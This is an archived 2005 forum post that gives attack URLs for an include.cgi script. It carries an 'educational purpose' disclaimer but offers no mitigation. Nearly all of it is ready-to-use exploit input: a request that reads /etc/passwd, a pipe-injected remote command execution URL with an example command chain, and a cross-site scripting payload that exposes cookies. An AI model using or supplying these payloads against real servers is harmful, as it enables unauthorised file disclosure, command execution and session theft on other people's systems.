Remote Command Execution In Include.cgi Script

qcred11

Apr 25 2005, 03:29 PM

QUOTE

remote command execution in include.cgi script

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE

1)file showing
http://www.target.com/cgi-bin/include.cgi?/etc/passwd

2)remote code execution
http://www.target.com/cgi-bin/include.cgi?|command

3)CSS
www.target.com/cgi-bin/include.cgi?<script>alert(document.cookie)</script>

ex:
http://www.target.com/cgi-bin/include.cgi?|ls;uname -a;

greetz to all magattack memebers

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.